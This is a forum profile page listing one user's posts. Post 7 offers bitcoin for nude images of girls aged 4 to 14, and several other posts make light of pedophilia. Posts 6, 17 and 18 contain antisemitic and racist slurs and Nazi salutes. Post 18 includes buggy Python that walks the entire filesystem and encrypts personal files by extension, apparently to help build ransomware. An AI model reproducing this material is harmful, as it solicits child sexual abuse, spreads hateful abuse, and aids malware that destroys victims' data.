User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 1192
  6. 1193
  7. 1194
  8. 1195
  9. 1196
  10. 1197
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    I'd prefer my 19th century loli to be named Rosemary or Kesiah.

    Rosemary is cute as well fam (n_n")
  2. Sophie Pedophile Tech Support
    Cousin/Cousette

    Cosette is a very cute name for a very cute 19th century loli. Yes that's a Les Misérables reference. What can i say i'm cultured af fam.
  3. Sophie Pedophile Tech Support
    Is this for real? Lol.
  4. Sophie Pedophile Tech Support
    ♪I started a joke which started the whole world crying
    But I didn't see that the joke was on me oh no
    I started to cry which started the whole world laughing
    Oh If I'd only seen that the joke was on me

    I looked at the skies running my hands over my eyes
    And I fell out of bed hurting my head from things that I said
    'Till I finally died which started the whole world living
    Oh If I'd only seen that the joke was on me

    I looked at the skies running my hands over my eyes
    And I fell out of bed hurting my head from things that I said
    'Till I finally died which started the whole world living
    Oh If I'd only seen that the joke was on me
    Oh no that the joke was on me♪
  5. Sophie Pedophile Tech Support
    Invest it to make more money.
  6. Sophie Pedophile Tech Support
    Hitlers birthday on 4/20 is the stupiest fucking may may you weed smoking hippie stoner LEGALIZE DA INTERNATIONAL HERB faggots have ever come up with. You think it's cool to put a fucking genocidal mass murderer in association with cannabis just to be LOL SO RANDUMB. People like you are why weed is gonna stay illegal federally for the next 50 years. Stupid fucking potheads get a life and read a history book.

    Go fuck yourself, genocidal maniac or not the kikes are actually fucking cancer.
  7. Sophie Pedophile Tech Support
    I'll trade you 0.025BTC for every naked picture you can send of female family members below the age of 14 but above the age of 4. We'll employ comsec for the particulars, do you XMPP?
  8. Sophie Pedophile Tech Support
    Fully rested.
  9. Sophie Pedophile Tech Support
    Like moths to a flame, fam :/ And it all seems very unhealthy to me.
  10. Sophie Pedophile Tech Support
    I have met several. And by several I mean more than 5. Not gonna count em all or tell their stories but I'll tell you I attract the fucked up ones for sure.

    Yes but are you the type of person that made them fucked up in the first place? That's kind of the point here. Not that i'd ever rape a child, just saying.
  11. Sophie Pedophile Tech Support
    They liked it and wanted more.

    Silence Satan. I said abused, do not tempt me.
  12. Sophie Pedophile Tech Support
    I don't imagine you have, and neither have i, in real life at least. On the internet i've met several, and here is where it gets weird. They all knew i like younger girls, but instead of avoiding me like the plague like any sane person would do they displayed an apparent interest in me beyond what i would conisder normal. A friendly interest even. I wonder about the psychological mechanisms behind this.

  13. Sophie Pedophile Tech Support


    This song relates to your life sploo.
  14. Sophie Pedophile Tech Support
    I pity the fool that doesn't have a hot hebe cousin.
  15. Sophie Pedophile Tech Support
    I thought you were going for the "you're crazy and hallucinated the scissors being in the story" angle and I was trying to play along. I was hoping everyone would be like "there's no mention of scissors in the story breh" and mq would be like "oh shit am I crazy" and post a screenshot and circle the word scissors but then I'd ninja edit the post to remove the word scissors from the screen shot and he'd start to doubt his sanity.

    That would have been funny.
  16. Sophie Pedophile Tech Support
    Glücklich geburtstag, Mein Führer!
  17. Sophie Pedophile Tech Support
    Congratulations Mein Führer. Sadly the kikes won the war but the greatest victory lies in stirring the hearts of your people.

    Sieg Heil.



    Ich glaub am den endsieg.
  18. Sophie Pedophile Tech Support
    Per the usual: shut up spectroll you dumb nigger.

    ​

    Python is generally considered interpreted although interestingly it does run on a virtual machine of sorts, although it's very different from the JVM. It is true Python is in reasonable benchmarks slower than lower level languages, although PyCrypto is implemented in C. Much of Python's standard lib and perf intensive third party libraries are implemented in C and exposed to python through a thin layer on top of in-process interop.



    Pyinstaller isn't really compilation in the classical sense. Most of what pyinstaller is is bundling a portable python interpreter with your program's source code, you shouldn't see any performance improvement as a process of build with pyinstaller verses running on an interpreter. I'm not sure if it's fair to call either the python VM or the JVM a "sandbox environment" since they can both make system calls and interact with the OS in the same ways a compiled binary can (although the JVM does have some provisioning for true sandboxing as in a browser environment, but no one really uses it anymore because it was a shitshow of exploits and just generally a poorly considered system) but it's true you're largely abstracted away from many architecture and OS details in such environments.

    AAAAnnnnyyyyway, this is exactly the kind of place where threading makes sense. There is an unfortunate detail of CPython (the python implementation I'm sure you're using, interestingly there are other implementations of the language but you don't need to worry about that) called the global interpreter lock or GIL that makes threading in python a somewhat different proposition than in other languages. You can read about the details, it's pretty interesting, but the gist of it is that for CPU bound tasks (like crypto, but in contrast to IO bound tasks like requesting resources over the network or reading from disk (crypto in this case will use your disk but likely it will bottleneck at the CPU)) are not a good candidate for multithreading.

    Fortunately you can use a better core library called multiprocessing, semantically, from your perspective, it's the same thing as threads, the difference is largely an implementation detail. The basic strategy is to build up a list of files you want to encrypt using os.walk (presumably fast enough that you can do it in the main thread without things being too slow) and stuff them into a queue (if that's not true you can parallelize the filesystem walk but I don't think it's what'll be slow), and then start up N processes consuming from the queue where N is your number of cores or thereabouts.

    So in the context of your program I'd rewrite your selectfiles function something like this (warning, untested code):


    from multiprocessing import Pool

    def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

    def selectfiles():
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
    for file in files:
    if file.endswith(".docx",".pdf",".rar",".jpg",".jpeg",".png",".tiff",".zip",".7z",".exe",".mp3"):
    files_to_enc.push(os.path.join(root, file))

    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)


    By the nature of `Pool.map` the function passed as the first arg will always be invoked with a single argument which will be an item from the queue the pool is processing (a queue of filenames in this case) so single_arg_encrypt_file is just a means of ensuring the signature of the function passed to .map is what's expected.

    11/10

    Thorough as always, will test your code shortly.
  19. Sophie Pedophile Tech Support
    I was a mod on four major forums on Zoklet, long before you even showed your ugly pedophiliactic face around those parts. And I had all my co-mods booted off those forums, including zok himself (who booted himself out of Bad Ideas, at my request), so I could run them all singlehandedly. I was also a Totse mod (having the unique ability to appoint myself as a mod without the administrator's knowledge or permission). Even before all that… well, let's not go there. The point is this: I'm wise and adept in all fields of study, and don't you forget it, son. Show some respect for your elders, at least.

    [greentext]>pedophiliactic[/greentext]

    Coined 2016, -SpectraL

    I modded all forums on Zoklet, as global. I win.

    [greentext]>I'm wise and adept in all fields of study, and don't you forget it, son[/greentext]

    A wise man knows that he knows nothing -SpeciaL.
  20. Sophie Pedophile Tech Support
    Well, I obviously don't know shit about Python. I had thought it was always ran within it's own enviorment, like how Java is ran in the JRE.

    Sorry i didn't mean to be condescending or anything.
  1. 1
  2. 2
  3. 3
  4. ...
  5. 1192
  6. 1193
  7. 1194
  8. 1195
  9. 1196
  10. 1197
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top